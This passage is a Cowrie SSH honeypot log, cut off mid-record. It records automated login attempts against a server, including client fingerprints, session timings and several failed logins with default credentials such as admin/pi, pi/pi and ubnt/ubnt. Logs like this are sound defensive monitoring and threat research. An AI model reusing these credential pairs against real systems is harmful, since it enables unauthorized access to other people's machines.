{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.406897Z","src_ip":"87.120.191.13","session":"5aa8844fc4cf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.426855Z","src_ip":"87.120.191.13","session":"1df20127701f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.428794Z","src_ip":"87.120.191.13","session":"1df20127701f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.517938Z","src_ip":"87.120.191.13","session":"8080dc0d91b6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.519376Z","src_ip":"87.120.191.13","session":"8080dc0d91b6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pi","message":"login attempt [admin/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.800155Z","src_ip":"87.120.191.13","session":"474c712c0a9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33946,"dst_ip":"1.2.3.4","dst_port":22,"session":"0815cc9dca73","protocol":"ssh","message":"New connection: 212.227.235.229:33946 (1.2.3.4:22) [session: 0815cc9dca73]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.997605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.004039Z","src_ip":"212.227.235.229","session":"0815cc9dca73"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.252328Z","src_ip":"212.227.235.229","session":"0815cc9dca73"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.446464Z","src_ip":"87.120.191.13","session":"0e9d45a2776f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"pi","message":"login attempt [ubnt/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.458268Z","src_ip":"87.120.191.13","session":"5aa8844fc4cf"}
{"eventid":"cowrie.login.failed","username":"noc","password":"pi","message":"login attempt [noc/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.466988Z","src_ip":"87.120.191.13","session":"e487b1789787"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.514148Z","src_ip":"87.120.191.13","session":"ff4a326db3a1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.518140Z","src_ip":"87.120.191.13","session":"8080dc0d91b6"}
{"eventid":"cowrie.login.failed","username":"student","password":"pi","message":"login attempt [student/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.555702Z","src_ip":"87.120.191.13","session":"1df20127701f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.868855Z","src_ip":"87.120.191.13","session":"474c712c0a9b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35176,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bb5d9008177","protocol":"ssh","message":"New connection: 87.120.191.13:35176 (1.2.3.4:22) [session: 7bb5d9008177]","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.890965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.908459Z","src_ip":"87.120.191.13","session":"7bb5d9008177"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:33.949163Z","src_ip":"87.120.191.13","session":"7bb5d9008177"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ubnt","message":"login attempt [admin/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.080474Z","src_ip":"87.120.191.13","session":"7bb5d9008177"}
{"eventid":"cowrie.login.failed","username":"shin","password":"shin","message":"login attempt [shin/shin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.258460Z","src_ip":"212.227.235.229","session":"0815cc9dca73"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.469688Z","src_ip":"87.120.191.13","session":"0e9d45a2776f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.479375Z","src_ip":"87.120.191.13","session":"5aa8844fc4cf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.487754Z","src_ip":"87.120.191.13","session":"e487b1789787"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35186,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b79efdccde","protocol":"ssh","message":"New connection: 87.120.191.13:35186 (1.2.3.4:22) [session: e5b79efdccde]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.488996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.489775Z","src_ip":"87.120.191.13","session":"e5b79efdccde"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35192,"dst_ip":"1.2.3.4","dst_port":22,"session":"77d007a34047","protocol":"ssh","message":"New connection: 87.120.191.13:35192 (1.2.3.4:22) [session: 77d007a34047]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.498566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.499372Z","src_ip":"87.120.191.13","session":"77d007a34047"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35208,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a46404c5094","protocol":"ssh","message":"New connection: 87.120.191.13:35208 (1.2.3.4:22) [session: 6a46404c5094]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.507687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.508284Z","src_ip":"87.120.191.13","session":"6a46404c5094"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.509746Z","src_ip":"87.120.191.13","session":"e5b79efdccde"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.518512Z","src_ip":"87.120.191.13","session":"77d007a34047"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.528597Z","src_ip":"87.120.191.13","session":"6a46404c5094"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.535706Z","src_ip":"87.120.191.13","session":"ff4a326db3a1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.539554Z","src_ip":"87.120.191.13","session":"8080dc0d91b6"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35212,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b3b96f40ff","protocol":"ssh","message":"New connection: 87.120.191.13:35212 (1.2.3.4:22) [session: c6b3b96f40ff]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.555645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.556240Z","src_ip":"87.120.191.13","session":"c6b3b96f40ff"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35220,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3123a674f8d","protocol":"ssh","message":"New connection: 87.120.191.13:35220 (1.2.3.4:22) [session: b3123a674f8d]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.558284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.559812Z","src_ip":"87.120.191.13","session":"b3123a674f8d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.572305Z","src_ip":"87.120.191.13","session":"e5b79efdccde"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.576659Z","src_ip":"87.120.191.13","session":"c6b3b96f40ff"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.578408Z","src_ip":"87.120.191.13","session":"1df20127701f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.579651Z","src_ip":"87.120.191.13","session":"b3123a674f8d"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ubnt","message":"login attempt [noc/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.591821Z","src_ip":"87.120.191.13","session":"6a46404c5094"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35236,"dst_ip":"1.2.3.4","dst_port":22,"session":"823ab2b734a0","protocol":"ssh","message":"New connection: 87.120.191.13:35236 (1.2.3.4:22) [session: 823ab2b734a0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.596643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.597359Z","src_ip":"87.120.191.13","session":"823ab2b734a0"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.602888Z","src_ip":"87.120.191.13","session":"77d007a34047"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hm